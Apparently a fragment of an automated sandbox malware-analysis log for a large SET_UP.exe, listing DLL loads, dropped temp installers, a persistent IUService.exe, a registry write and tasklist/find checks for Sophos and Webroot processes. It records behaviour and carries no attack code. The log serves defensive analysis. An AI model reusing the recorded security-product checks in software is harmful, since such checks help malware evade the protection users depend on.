                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: shfolder.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: shfolder.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: sfc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: explorerframe.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: dlnashext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wpdshext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: wtsapi32.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: wtsapi32.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: oleacc.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: msimg32.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: oledlg.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: dbghelp.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: pla.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: pdh.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: tdh.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: cabinet.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: wevtapi.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: shdocvw.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpWindow found: window name: TMainFormJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: SET_UP.exeStatic file information: File size 74139832 > 1048576
                      Source: Binary string: wntdll.pdbUGP source: IUService.exe, 00000022.00000002.2339699051.00000000099FB000.00000004.00000020.00020000.00000000.sdmp, IUService.exe, 00000022.00000002.2343075426.0000000009D50000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: IUService.exe, 00000022.00000002.2339699051.00000000099FB000.00000004.00000020.00020000.00000000.sdmp, IUService.exe, 00000022.00000002.2343075426.0000000009D50000.00000004.00000800.00020000.00000000.sdmp
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp.4.drStatic PE information: real checksum: 0x33908a should be: 0x33ab8c
                      Source: VER7RSX5CP4YEKECQGJ84KT.exe.0.drStatic PE information: real checksum: 0x61312b should be: 0x807c92
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp.6.drStatic PE information: real checksum: 0x33908a should be: 0x33ab8c
                      Source: is-TBCRP.tmp.7.drStatic PE information: real checksum: 0x3ca18 should be: 0x33f43
                      Source: VER7RSX5CP4YEKECQGJ84KT.exe.0.drStatic PE information: section name: .didata
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp.4.drStatic PE information: section name: .didata
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp.6.drStatic PE information: section name: .didata
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02540A90 push eax; mov dword ptr [esp], EEE9E8BBh0_2_02540A92
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0253D880 push eax; mov dword ptr [esp], F6F7F0F1h0_2_0253D88F
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_50012004 push 50012030h; ret 34_2_50012028
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F22C push eax; retn 00FEh34_2_5000F230
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F234 push eax; ret 34_2_5000F238
